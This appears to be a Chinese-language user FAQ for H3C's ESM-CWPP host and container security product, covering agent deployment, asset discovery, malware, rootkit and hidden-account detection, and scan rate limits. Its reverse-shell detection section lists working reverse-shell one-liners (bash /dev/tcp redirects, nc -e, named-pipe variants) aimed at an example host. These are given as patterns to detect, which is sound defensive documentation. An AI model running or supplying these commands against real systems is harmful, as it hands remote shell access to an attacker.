- 产品与解决方案
- 行业解决方案
- 服务
- 支持
- 合作伙伴
- 关于我们
手册下载
H3C SecCenter ESM-CWPP终端安全管理系统
用户FAQ
Copyright © 2025 新华三技术有限公司 版权所有,保留一切权利。
非经本公司书面许可,任何单位和个人不得擅自摘抄、复制本文档内容的部分或全部,并不得以任何形式传播。
除新华三技术有限公司的商标外,本手册中出现的其它公司的商标、产品标识及商品名称,由各自权利人拥有。
本文档中的信息可能变动,恕不另行通知。
Agent安装方式?轻量级agent与传统的agent有什么不同?
agent安装是否需要root权限,如果系统的root用户的密码改了,是否有影响,是否需要重新装?
Agent是否需要升级,多长时间升级一次,升级的时候,是否需要重启操作系统?
什么条件下agent会降级,降级后如何恢复?降级后agent功能是否还生效,是否能进行检测和防护?
资产管理,包括主机和应用的相关配置是自动探测?通过哪些技术原理实现的?准确率多少?
对外开放的端口具体是怎么发现?如果端口是映射出去是否还统计为对外端口?
进程采集是实时的,还是快照模式的?获取进程的具体方式是什么?
如果不做体检能不能实时监测发现威胁?实时监控具体监控内容是哪些?
Linux新建机器空密码是禁止登录的?为什么还有空密码的上报?是误报吗?
Linux系统下的隐藏帐号是怎么定义的?具体的技术实现原理?
Linux系统的日志删除是删除的整个日志文件?如果没删除日志文件,只删除了其中一段日志或者只删除了一行日志能否检测到?
容器安全系统的扫描任务如何通过提高限速或者开放限速提高扫描速度?
ESM-CWPP终端安全管理系统用户FAQ
本文档介绍ESM-CWPP产品的用户常见问题及解答。
(1) agent兼容主流windows和Linux操作系统以及国产操作系统;
(2) Agent设置了较多的保护机制,包括超限机制防止自我资源占用、自我保护机制防止异常攻击、异常诊断机制、密码保护机制等;
(3) 支持对agent的管理开放,包括可显示和管理所有agent,包括agent状态、版本、启停、卸载等。
Agent安装方式主要有3种,它支持下载安装包手动安装,也支持通过一条命令进行安装,当然最快捷的是通过批量安装部署的方式。
和传统的agent主要有二点不同:
(1) 轻量化,采用检测与响应的思路,而不采用传统比较重的杀毒模式,占用较小的内存和CPU资源,提供对agent的资源占用进行限制;
(2) 弹性自适应,可以根据业务的负载进行弹性调整,在业务主机的高峰期如果有需要可以实现降级或者自杀;
Agent安装需要root权限。如果系统的root用户的密码改了,不会造成任何影响,也无需重新安装Agent。
Agent没有固定的升级时间,随版本升级配套升级,不用重启操作系统,也不用手动去重新安装,可以通过后台的agent升级策略来进行自动升级。
降级只是限速阈值调到更低,主机CPU恢复后会取消降级。限速期间这些入侵检测的功能还是有,只是检测速度会比较慢,入侵检测等功能还是照常有的。所以降级的这个间隙,即使是有异常情况还是具备发现能力的,不会漏掉这个时间的风险情况。
支持,可以自动发现未安装agent的主机。
资产管理,包括主机和应用的相关配置是自动探测的,进程账号端口windows都是通过API获取的,linux是通过命令或者文件来实现的,比如账号,linux是通过解析/etc/shadow和/etc/passed采集账号的信息,比如锁定的账号的判断是/etc/shadow中账号密码字段为"!";网站、web容器通过进程的采集以及WEB容器配置的分析采集到网站信息;因为是在主机侧进行采集,准确率100%
通过磁盘扫描获取目录路径。
端口发现是通过调用系统api接口或者执行系统命令获取端口监听状态。如果端口开放的IP地址是127.x.x.x或者ipv6地址::1的,表示对内端口;除此之外的都是对外端口。
资产采集:目前已经支持,资产采集与合规基线模块通过插件技术实现,支持进行安全定制开发,实现资产采集和配置核查,目前支持MySQL(Linux&Windows),Oracle(Linux&Windows),SQL Server(仅Windows),Redis(Linux&Windows),MongoDB(Linux&Windows),Memcache(仅Linux),ElasticSearch(仅Linux),Hadoop(仅Linux),DB2(Linux&Windows),SYBASE,TiDB(仅Linux),人大金仓(Linux&Windows),达梦(Linux&Windows),南大通用(仅Linux)。
进程采集采用快照模式。Windows是通过读系统API方式获取进程,Linux是通过内核接口,调接口读取进程信息,采取枚举等方式。
(1) 漏洞风险和入侵威胁支持全部体检和单项体检,全部体检通常在3-5分钟(病毒WebShell除外),单项体检在1-3分钟;
(2) 病毒和网马体检支持自定义目录,网马可自动识别web站点目录,体检扫描时间视文件量决定。
可以,主机安全核心能力就是实时监测;实时监控包括病毒、WebShell、反弹Shell、文件、账号、进程等,详细见产品内的功能列表。
漏洞知识体系对漏洞的收集和发现目前包括操作系统漏洞、应用组件漏洞及数据库漏洞,通过OVAL、NASL、爬虫、人工收集四种组合的方式进行漏洞发现、验证及展示。首先,采用OVAL漏洞框架,通过枚举方式进行漏洞发现,其次,采用NASL采集匹配漏洞信息,并通过脚本插件进行POC验证,再次,通过爬取CVE、CNVD等官方网站漏洞信息库,对漏洞的详情做收集并展示,最后,安全研究人员通过持续关注官方网站、GitHub收集到的漏洞信息,录入漏洞知识库。
系统漏洞中的业务影响评估,是结合检测出的漏洞与采集上来的资产进行匹配得出的。评估漏洞对进程的影响,展示系统内遭受到此漏洞影响的具体进程。
病毒木马程序通常会窃取用户数据或者对外攻击,消耗大量系统资源导致业务不能正常提供服务。主机安全支持云查杀引擎、网马查杀引擎、安天本地引擎、安天云引擎多引擎技术识别并查杀最新病毒。前端轻代理会采集可疑病毒木马程序的哈希指纹到云端,通过云查杀模块对哈希进行检测识别。若确认文件是恶意的,可以对单个文件进行隔离,或者批量选择进行一键隔离,隔离成功后,原始恶意文件将被加密隔离,后期可以在隔离区进行恢复。如果文件非恶意的,可以选择信任操作,加入信任后,主机安全将不再对该文件进行检测,后期可以在信任区对信任文件进行管理。
主机安全可检测八个分类下的病毒木马,包含木马、蠕虫、感染式病毒、黑客工具、灰色软件、风险软件、测试软件、垃圾文件等。支持三万余家族,一千万余变种病毒木马的准确识别和查杀,例如挖矿、勒索、rootkit、bootkit、二进制病毒木马等。可识别286类文件格式,解压缩包、自解压包、安装包等40类包裹。云端恶意软件检出规则数量超过5亿,白名单规则数量超过2亿。
主机安全可详细展示病毒木马相关信息,包含病毒的类型、hash、路径,并且提供对病毒的隔离、信任和下载,支持显示病毒引擎版本号。同时可设置轻巧、中度、严格三种防护等级,轻巧防护下监控程序执行和网页文件写入,确保病毒无法运行,对系统性能无影响;中度防护下监控程序执行、写入,网页文件写入,确保病毒无法入侵,对系统性能影响小;严格防护下监控对程序和网页文件任何形式的访问,对系统性能会有一定影响。支持自动隔离(在隔离区备份原文件)及不处理(只写日志)两种处理方式。
Linux是隔离到该文件对应分区根目录下的隐藏目录.virus_isolation
进程监控可以监控进程的文件、注册表、网络行为及敏感API调用行为;linux目前只支持进程的文件操作/进程启动信息等;
rootkit是一种旨在为控制者建立一个长久、隐蔽的访问权限通道,它有两个特性,一方面它想要保持隐藏,另外一方面rootkit需要通信;对rootkit检测一方面我们有静态的特征引擎的比对,另一方面动态的方面我们有检测隐藏进程和进程隐藏端口的功能;
监测不是通过History,这个比较容易被删除;我们采用了轻量级的监测技术。
操作审计针对linux系统,用PROMPT_COMMAND实现的,但开启时对已经登录的Shell没法生效,如果环境变量PROMPT_COMMAND被清除掉,之后的Shell命令就不会被记录,但用户修改环境变量PROMPT_COMMAND的命令会被记录,服务端会告警
反弹shell分两部分,体检和实时监控,安全体检时体检后检测出来的,安全防护那边是实时监控的。通过进程的启动命令如(dash、csh、tcsh、bash、sh)等及其运行时的参数、重定向的文件描述符,及网络连接判断是否为反弹shell。
(1) 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端;
(2) 检测可疑的反弹shell进程,进程启动参数异常或进程标准输入、输出及错误输出被重定向到套接字,支持bash、nc shell、管道、cts 低权限shell。
主要类型:
· 标准套接字重定向到套接字方式
/bin/bash -i >
/dev/tcp/192.168.172.2/1234 0<&1 2>&1
/bin/bash -i > /dev/tcp/192.168.172.2/1234 0>/dev/tcp/192.168.172.2/1235
2>&1
nc 192.168.172.2 1234 -e /bin/bash
· 标准套接字重定向到管道方式
cat /tmp/backpipe | /bin/bash -i
2>&1 | nc 192.168.172.2 1234 > /tmp/backpipe
nc 192.168.172.2 1234 0</tmp/backnode | /bin/bash -i 1>/tmp/backnode
2>/tmp/backnode
· 混合模式
/bin/bash -i 0>/dev/tcp/192.168.172.2/1235 | nc 192.168.172.2 1234
· 支持dash、csh、tcsh、bash、sh等shell命令反弹shell检查
· 支持对使用udp进行通信的反弹shell检查(基于4种的shell命令而言)
Win和Linux对于禁用的空密码帐号会上报至服务端,Linux只有登录Shell为类似于/bin/nologin之类的才不会上报,这类帐号取消禁用也是不能登录的。
定义:影子账户,顾名思义就是隐藏的账户。在黑客技术里与后门安装技术挂钩;由于它的隐藏性强,入侵者多在被入侵的电脑里加上这样的账户,用于远程登录以便控制客户机。
检测原理如下:Linux是Uid重复具备了root的权限的帐号, Win是通过注册表的检测发现“一些在控制面版或者dos命令下无法发现的账号,以及一些通过注册表特殊处理导致的非法提权账号”。
目前日志删除检测windows可以检测整个日志删除行为,当前版本暂时未检测删除某一行的行为; Linux可以通过shell审计发现日志操作行为。 另外可支持针对WEB日志的一段日志删除行为。
支持留存6个月的shell命令数据;根据用户在控制端设置的时间期限为准。
部分检测项(如数据库)需要置入账号和密码才能进行检测,系统会自动识别需要输入资产类型,并提供账号密码界面,具体可查看合规基线-基线检查-环境检查。
可以通过shell审计发现私钥文件非法保存,并通过增补采集插件支持增加对登录方式筛选,包括仅密码登录主机、仅key登录主机、key和密码都可登录主机。
首次资产采集的时间,在 agent 安装结束后,5-10 分钟内完成; 常规化的采集,可在资产管理模块的主机菜单内设置,5 分钟至 4 小时不等。
支持,插件我们目前支持C++或者Python语言的插件开发.
监测型的误报是自身配置规则的问题,我们会协助完善基础安全配置手册来协助降低,并且后续会增加统一规则中心和统一告警中心的功能,进一步降低误报率;
检测型的误报一方面主机安全系统提供了对检测的事件进行批量信任,相同特征的事件(如病毒木马)后续不会被检测出来,对告警的处置和缩减结果也有历史记录;另一方面主机安全的检测引擎也持续优化和升级,如病毒引擎每周更新一次,持续提升检测准确性降低误报率。
(1) 上线前检查
¡ 资产采集:即docker资产收集和发现,并可通过对比和关联分析,结合安全规则设置,触发安全告警;
¡ 安全基线:针对docker镜像自身制定合规基线,以及所承载业务的配置缺陷进行检测和发现;
(2) 安全防护
¡ 安全docker:针对具体场景,提供安全docker的封装和加固,比如Nginx、tomcat、Apache、MongoDB等
¡ 主动发现:通过docker安全扫描工具,发现和检测不合规和异常docker
¡ 集中化的管理平台集中的展示、配置、查询、告警、安全报表、权限管控等
支持采集全网资产详细信息,提供对系统资产和活动的深入视图,绘制内部流量可视拓扑,实现细粒度的安全策略管理。可展示流量访问的详细信息,包括且不限于主机基本信息、主机之间互访关系、服务类型、服务数量、流量计数、流量首次访问时间、流量最近访问时间等。
支持识别全网主机与主机之间的连接访问关系和访问次数,帮助企业梳理业务访问逻辑,包含业务角色、标识应用、流量、端口等。基于可视化方式展示资产的互访关系,快速发现内部不合规访问,对主机进行全方位的防护策略管理,控制业务流量访问。
正常使用还是保持20%cpu限速。仅需要做容器、镜像扫描资源消耗较大的业务时候临时关闭限速(后台-主机管理-主机性能管理-配置),扫描完成后重新打开限速。
所有防护进程只都进行了绑核操作,只会在某一个核心上运行。就算完全放开最多也只会消耗单核cpu。可以选择业务不是那么繁忙的时间放开限速进行扫描业务。
如果服务器本来cpu核心数比较少(少于4核),建议不要开放限速。
放开限速执行扫描任务的时候建议选择4核心以上且整体CPU占用70%以下的时候进行。
支持
